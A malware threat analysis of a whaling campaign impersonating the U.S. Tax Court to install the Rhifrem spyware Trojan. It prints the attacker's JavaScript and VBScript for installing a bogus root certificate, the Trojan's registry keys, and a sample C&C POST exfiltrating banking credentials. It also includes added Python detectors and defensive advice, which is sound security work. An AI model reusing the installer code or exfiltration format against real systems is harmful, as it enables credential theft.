              Threat Analysis

              Tax Court Phishing/Whaling Emails Used to Install Spyware

              Executive Summary

              A new wave of "whaling" emails pretending to be from the United States Tax Court attempts to convince targets to install a spyware Trojan known as Rhifrem.  Whaling is the term for phishing messages targeted at "big fish" such as C-level executives.

              Analysis

              The target receives an e-mail message pretending to be from the United States Tax Court.  The From field in the message is missing an 's' on the word "States":

              From: United State Tax Court <notice@ustaxcourt.org>

              The Subject field includes what is referred to in the message as a docket number:

              Subject: Notice of Deficiency #62-84989-711420-788

              The message uses the name and brand of the United States Tax Court and reads:

              Docket No. 62-84989-711420-788. Filed May, 2008.

              Issued by the
              UNITED STATES TAX COURT
              Washington, DC 20217

              Commissioner of Internal Revenue
              Petitioner.

              versus

              Jon Doe, CEO
              Business Name
              555-212-1234
              Respondent.

              PETITION

              The Petitioner hereby petitions for a redetermination of forth by the Commissioner of Internal Revenue in his notice of deficiency (AP:FE:BOS:JHK) dated May 4, 2008

              Please click here to download a Copy of the Order, Letter, Notice or Other Document Being Appealed

              This matter is before the Court on respondent.s Motion for Summary Judgment, filed May 10, 2006, and respondent.s Motion for Penalty under I.R.C. Section 6673, also filed May 10, 2006. As motions, without prejudice, and remand this case to respondent.s Office of Appeals.

              Respectfully submitted,

              Bennett H. Klein
              Tax Court Bar No KB0214
              400 Second Street, N.W.,
              Washington, D.C. 20217.

              Notice the use of periods where apostrophes should be in each instance of "respondent.s" in the email body.

              The text "Please click here to download a Copy of the Order, Letter, Notice or Other Document Being Appealed" is a hyperlink to (link intentionally defanged):

              hxxp://www.ustax-courts.com/ViewCase.php?nr=62-84989-711420-788

              The number in the URL matches the number in the subject and body of the message and may vary.  The number parameter in the URL is not required for the scam to work.  It is purely informational, and is used by the attackers to see which targets actually visited the page.  It is not used to correlate stolen data to targets, and the server does not limit downloads based on previous use of the same number.
               
              The real domain of the United States Tax Court is "ustaxcourt.gov" and not those (ustax-courts.com and ustaxcourt.org) used in this message.  Even though it might lend an air of credibility to the message, the attackers probably chose not to use the real domain name in the From field because they did not want replies going back to the U.S. Tax Court's actual servers, where they might prompt an alert so early in the scam's timeline.  Such an early warning could have negatively impacted distribution of the whaling messages by giving anti-spam solution providers time to update signatures.
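              The domain mismatch described above (a display name claiming the Tax Court, a sender domain and link host outside ustaxcourt.gov) can be turned into a mail-gateway check. The following is an added example, not code from the original analysis; the sample messages are constructed from the defanged values in this write-up, and the legitimate sample's link path is a placeholder.

```python
# Added example (not from the original analysis): a mail-gateway check for the lure
# described above. It flags a message whose From display name impersonates the U.S.
# Tax Court while the sender domain or any link in the body falls outside the court's
# real domain, ustaxcourt.gov. The samples are constructed from the defanged values in
# the write-up; the legitimate sample's link path is a placeholder.
import re
from email import message_from_string
from email.utils import parseaddr

REAL_DOMAIN = "ustaxcourt.gov"
IMPERSONATES = re.compile(r"tax\s*court", re.I)   # display names that claim the court
LINK_HOST = re.compile(r"https?://([^/\s\"'>]+)", re.I)

def belongs_to(host: str, domain: str) -> bool:
    """True when host is the domain itself or one of its subdomains."""
    host = host.lower().rstrip(".")
    return host == domain or host.endswith("." + domain)

def check_message(raw: str) -> dict:
    """Return the sender domain, links outside REAL_DOMAIN and a verdict."""
    msg = message_from_string(raw)
    name, addr = parseaddr(msg.get("From", ""))
    sender_domain = addr.rpartition("@")[2].lower()
    body = msg.get_payload(decode=True).decode("utf-8", "replace")
    foreign = sorted({h.lower() for h in LINK_HOST.findall(body)
                      if not belongs_to(h, REAL_DOMAIN)})
    claims_court = bool(IMPERSONATES.search(name))
    # A message that claims to be the court is suspicious if its sender domain
    # or any of its links is not under ustaxcourt.gov.
    suspicious = claims_court and (not belongs_to(sender_domain, REAL_DOMAIN) or bool(foreign))
    return {"claims_court": claims_court, "sender_domain": sender_domain,
            "foreign_links": foreign, "suspicious": suspicious}

# Constructed sample mirroring the whaling message (defanged hosts from the write-up).
WHALING_SAMPLE = (
    "From: United State Tax Court <notice@ustaxcourt.org>\n"
    "Subject: Notice of Deficiency #62-84989-711420-788\n"
    "Content-Type: text/html\n\n"
    "<p>Please <a href='http://www.ustax-courts.com/ViewCase.php?nr=62-84989-711420-788'>"
    "click here</a> to download a Copy of the Order</p>\n"
)
# Constructed legitimate-looking sample: real domain in From and link (path is a placeholder).
LEGIT_SAMPLE = (
    "From: United States Tax Court <notice@ustaxcourt.gov>\n"
    "Subject: Docket notice\nContent-Type: text/html\n\n"
    "<p><a href='https://www.ustaxcourt.gov/placeholder'>View</a></p>\n"
)
```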

              At the time of the attack, the domain used by the attackers, ustax-courts.com, resolved to 221.195.42.67, a virtual hosting server in IP address space administered by China Network Communications Group in Beijing.  DNS for the domain was provided by "4everdns" nameservers in Beijing and Shanghai.

              Upon clicking the link, the page loads from the attacker's server and uses client-side JavaScript to identify the browser: the BrowserOK() function below tests navigator.appName for "Microsoft" rather than reading the User-Agent HTTP header.

                  function BrowserOK() { ret=(navigator.appName.indexOf("Microsoft")!=-1); return(ret) }
                  function SetMsg()
                  {
                    var div=document.getElementById("msg");
                    if(BrowserOK()) { div.innerHTML="<iframe src='body.php?case=' width='100%' height='100%' frameborder='0'></iframe>"; }
                    else { div.innerHTML="<br>This website requires Microsoft Internet Explorer, version 5.5 or better...

              If it doesn't detect Internet Explorer, the user receives a message that IE is required, which even provides a download link.

              If the user is using Internet Explorer, JavaScript is used to create an IFRAME with the content loaded from body.php on the same server.

              The body.php page uses JavaScript to install a certificate for a root CA (certificate authority) pretending to be "VeriSign Trust Network".

                credentials="MIIGIDCCBAigAwIBAgIBADANBgkqhkiG9w0BAQQFADBtMQswCQYDVQQGEwJV...

                On Error Resume Next
                Dim Enroll

                Set Enroll=CreateObject("CEnroll.CEnroll.2")
                if((Err.Number=438) OR (Err.Number=429)) Then
                  Err.Clear
                  Set Enroll=CreateObject("CEnroll.CEnroll.1")
                End If

                if Err.Number<>0 then
                    document.write("<font color=#0D7C99 size=4>Error installing the Trusted Content digital certificate from 'Verisign Trust Network'.</font>")
                Else
                  Call Enroll.InstallPKCS7(credentials)
                  If err.Number<>0 then
                    document.write("<font color=#0D7C99 size=4>Error installing the Trusted Content digital certificate from 'Verisign Trust Network'.<br>Click <a href='?'>here</a>, or press the refresh button of your browser to install the digital certificate.</font>")
                  Else
                    window.location = "active.php"
                  End if
                End If

              End sub

              "VeriSign Trust Network" is the same name used by some legitimate VeriSign certificates. This is a simple camouflage attempt. However, VeriSign did not issue this certificate. It clearly lacks some of the information and features found in legitimate VeriSign certificates.

              The user receives multiple warnings when attempting to install and trust the certificate.

              If the certificate installation is successful, the user is redirected to active.php on the same server.  The active.php page attempts to install an ActiveX control.  The ActiveX control comes packaged as a Microsoft CAB file.  The CAB file is signed with a certificate fraudulently using the name Adobe Systems Incorporated, issued by the CA represented by the bogus VeriSign certificate.

              Internet Explorer can be configured to automatically install and run ActiveX code signed using trusted certificates.  Because the bogus certificate is now trusted, the user may never see a prompt to install the ActiveX control, depending on current settings.  By default, however, the user will see a prompt to install the control.

              Once the ActiveX control is installed, Internet Explorer must be restarted.

              The CAB file contains two files, Acrobat.exe and Acrobat.inf, which are extracted to a default location (usually a Temp subdirectory).  The INF file is processed automatically.  It simply tells Windows to run the EXE file.  The EXE file is an installer for the Rhifrem Trojan, also known as Fireming, although it's usually detected by anti-virus generically as a malicious BHO (Browser Helper Object).

              The executable drops a copy of the BHO code as a hidden file about 53 KB in size:

              %windir%\system32\Acrobat.dll

              ... and registers the BHO with the operating system by creating a set of registry entries for Acrobat.dll:

              HKEY_CLASSES_ROOT\CLSID\{BD942DA7-96C8-4342-84C6-E2BCFE69FE11}\"Adobe Acrobat ActiveX Control"

              HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{BD942DA7-96C8-4342-84C6-E2BCFE69FE11}

              The Trojan also creates the following registry keys from hard coded values in the executable:

              HKEY_LOCAL_MACHINE\SOFTWARE\Acrobat\1 = xxx.94.101.23

              HKEY_LOCAL_MACHINE\SOFTWARE\Acrobat\2 = 8

              HKEY_LOCAL_MACHINE\SOFTWARE\Acrobat\3 = /JJJ/parse.php

              The first is the IP address or hostname of the default C&C server, the second is the HTTP port used to communicate with it, and the third is the path to the C&C script which parses out requests and stolen data.

              Because each Rhifrem executable contains a hardcoded IP address for a C&C (command and control) server to be used in the attack, we know that the person who compiled the program is either the attacker or closely affiliated with the attacker(s).  In this case, the source code was compiled into an executable using the open source GNU C/C++ compiler distributed with MinGW (Minimalist GNU for Windows), a free lightweight POSIX environment for Windows.  The program was compiled by a user named "samo", or 金寶.  The use of the traditional (as opposed to simplified) Chinese characters indicates the author is not from mainland China, but perhaps from Taiwan or Hong Kong.

              After the victim re-launches Internet Explorer, the malicious "Rhifrem" BHO downloads the latest copy of itself from (link intentionally defanged):

              hxxp://xxx.6.202.56/cp/jj.exe

              ... and updates itself.

              The server at xxx.6.202.56 was used in past Rhifrem attacks in June and December 2007 that posed as an Adobe Shockwave Flash ActiveX control but in reality targeted certain banking sites (those variants were also known as Banker.GMH and Banker.HYN).

              The Trojan then goes about its primary duty.  It attempts to read client certificates (such as those often used to access secure banking sites), cookies, stored passwords and other information from Internet Explorer (Windows) and Adobe Flash Player.

              As the victim uses Internet Explorer to surf the web, a log of visited web sites is sent to the C&C server.  A copy of everything the victim posts to a web site via a form -- SSL protected or not -- is also sent.

              Rhifrem sends the information it collects to its C&C server in another China Network Communications Group IP address range via an HTTP POST request like:

              POST http://xxx.94.101.23/JJJ/parse.php?mod=log&user=Alice HTTP/1.0
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/5.0 Gecko/20050212 Firefox/1.5.0.2
              Host: xxx.94.101.23
              Content-Length: 149
              Pragma: no-cache

              curr=https%3A%2F%2Fwww.hackmebank.com%2Flogin.asp&next=http%3A%2F%2F
              www.hackmebank.com%2Faccounthome%2F&post=username%3Dalice%26password%3Dopensesame

              The "mod=log" requests also use other parameters in the POST request body to send other stolen data related to the site the victim is visiting:

              • cook: stolen cookies
              • klog: keylogger data

              Cookies and keylogger information are only stolen for select URLs.

              Other "mod=" values include:

              • cmd: ask the C&C server for instructions
              • file: send file to C&C server

              If the response to the mod=cmd request is an HTTP 404 (Not Found) error, the Trojan simply carries out the default command, which is an attempt to update itself.

              Files sent can include any file readable by the currently logged on user.  The files passwd123, KB0626395.log, and PFX files of exported certificates are created by the Trojan and contain stolen data.  They may also be sent to the attackers this way.
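              The C&C request format described above (a POST to parse.php with mod=log, mod=cmd or mod=file, and a URL-encoded form post nested inside the "post" parameter) can be parsed from proxy captures to alert on exfiltration. The following detector is an added example, not code from the original analysis; its sample requests are constructed, and 192.0.2.10 stands in for the C&C address.

```python
# Added example (not from the original analysis): a detector for the Rhifrem C&C
# traffic described above. It scans raw HTTP requests captured at a proxy and returns
# a structured alert for any POST to a parse.php path whose query carries mod=log,
# mod=cmd or mod=file, decoding the nested form post that mod=log exfiltrates.
# The sample requests are constructed; 192.0.2.10 is a placeholder C&C address.
import re
from typing import Optional
from urllib.parse import urlsplit, parse_qs

SENSITIVE = re.compile(r"pass|pwd|pin|ssn|card", re.I)  # credential-like field names

def parse_request(raw: str) -> Optional[dict]:
    """Return an alert dict for a Rhifrem-style parse.php request, else None."""
    head, _, body = raw.partition("\n\n")
    method, target, _ = head.splitlines()[0].split(" ", 2)
    parts = urlsplit(target)
    if method != "POST" or not parts.path.endswith("/parse.php"):
        return None
    query = parse_qs(parts.query)
    mod = query.get("mod", [""])[0]
    if mod not in ("log", "cmd", "file"):
        return None
    alert = {"mod": mod, "user": query.get("user", [""])[0], "c2": parts.hostname}
    if mod == "log":
        fields = parse_qs(body.strip())
        alert["site"] = urlsplit(fields.get("curr", [""])[0]).hostname
        # parse_qs already removed one layer of encoding, so the "post" value is
        # now the victim's original form body and can be parsed directly.
        posted = parse_qs(fields.get("post", [""])[0])
        alert["leaked_fields"] = sorted(posted)
        alert["credentials"] = any(SENSITIVE.search(k) for k in posted)
        alert["extra"] = [k for k in ("cook", "klog") if k in fields]
    return alert

# Constructed capture modeled on the request shown above.
SAMPLE_LOG = (
    "POST http://192.0.2.10/JJJ/parse.php?mod=log&user=Alice HTTP/1.0\n"
    "Content-Type: application/x-www-form-urlencoded\n"
    "Host: 192.0.2.10\n\n"
    "curr=https%3A%2F%2Fwww.hackmebank.com%2Flogin.asp"
    "&next=http%3A%2F%2Fwww.hackmebank.com%2Faccounthome%2F"
    "&post=username%3Dalice%26password%3Dopensesame"
    "&cook=session%3Dabc123\n"
)
SAMPLE_CMD = "POST http://192.0.2.10/JJJ/parse.php?mod=cmd&user=Alice HTTP/1.0\nHost: 192.0.2.10\n\n"
SAMPLE_BENIGN = "GET http://192.0.2.10/index.html HTTP/1.0\nHost: 192.0.2.10\n\n"
```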

              The following is information regarding the server and ustax-courts.com domain name used to host the malware at the time of the attack (the registration name and addresses are assumed to be bogus):


              Location  = Beijing, China
              lat/lon   = 39.55n, 116.26e
              source    = NET whois.apnic.net
              type      = guess
              place-key = cn-beijing
              geo-key   = cn-beijing -> .\data\geo.vdb

              Node Name Table
              ===============
              Domain name: ustax-courts.com
              Registrant Contact:
                 lu zhixin
                 zhixin lu luzhixin@yahoo.com
                 0516-3114698 fax: 0516-3114698
                 peixianchengguangdajie236hao
                 peixian ngsu 221600
                 cn
              Administrative Contact:
                 zhixin lu luzhixin@yahoo.com
                 0516-3114698 fax: 0516-3114698
                 peixianchengguangdajie236hao
                 peixian ngsu 221600
                 cn
              Technical Contact:
                 zhixin lu luzhixin@yahoo.com
                 0516-3114698 fax: 0516-3114698
                 peixianchengguangdajie236hao
                 peixian ngsu 221600
                 cn
              Billing Contact:
                 zhixin lu luzhixin@yahoo.com
                 0516-3114698 fax: 0516-3114698
                 peixianchengguangdajie236hao
                 peixian ngsu 221600
                 cn
              DNS:
              ns1.4everdns.com
              ns2.4everdns.com
              Created: 2008-05-14
              Expires: 2009-05-14

              Network Table
              =============
              CNCGROUP Hebei Province Network
              inetnum:      221.192.0.0 - 221.195.255.255
              netname:      CNCGROUP-HE
              descr:        CNCGROUP Hebei Province Network
              descr:        China Network Communications Group Corporation
              descr:        No.156,Fu-Xing-Men-Nei Street,
              descr:        Beijing 100031
              country:      CN
              admin-c:      CH455-AP
              tech-c:       KL984-AP
              remarks:      service provider
              mnt-by:       APNIC-HM
              mnt-lower:    MAINT-CNCGROUP-HE
              mnt-routes:   MAINT-CNCGROUP-RR
              status:       ALLOCATED PORTABLE
              remarks:      -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
              remarks:      This object can only be updated by APNIC hostmasters.
              remarks:      To update this object, please contact APNIC
              remarks:      hostmasters and include your organisation's account
              remarks:      name in the subject line.
              remarks:      -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
              changed:      hm-changed@apnic.net 20040329
              changed:      hm-changed@apnic.net 20060124
              changed:      hm-changed@apnic.net 20060125
              changed:      hm-changed@apnic.net 20080314
              source:       APNIC

              As of the initial release of this analysis, virus detection of various updates to the Rhifrem Trojan breaks down like this (number of the 32 VirusTotal participants that detected the file as a threat):

              Filename       Detections (of 32)
              Acrobat.cab    20
              Acrobat.dll    12
              jj.exe          5

              Solution

              Use a browser that supports anti-phishing technology.  This will alert users to suspected phishing sites and other website forgeries.


              In the case of malicious BHOs such as this, use of a browser other than Internet Explorer will prevent the attacker's JavaScript from attempting to install both the certificate and the BHO.  If somehow installed manually, the BHO cannot steal information and send it to the attacker's C&C server unless the victim uses Internet Explorer.

              Do not install certificates from web sites, even if the name matches a CA you trust.

              Do not allow signed ActiveX controls to be installed without prompting, even if they appear to come from a publisher that is trusted.

              The initial CAB file used to install the Trojan from the link in the whaling messages is detected by the majority of engines from major anti-virus vendors, and more are sure to add a signature for these versions of the Trojan in the coming hours and days.  Update AV signatures at the gateway and host.  It will be detected variously as:

              • DlRhiFrem.A
              • Fireming.E
              • BHO.hn
              • BHO.hp
              • Agent.NFV
              • Dwnldr-HCM
              • Trojan.Dropper
              • Backdoor.Trojan (a generic misclassification)

              Update anti-spam solutions and blocklists to prevent delivery of the email message to the target.

              Make sure web filtering and IDS/IPS solutions have updated signatures that can detect/block Trojan activity.
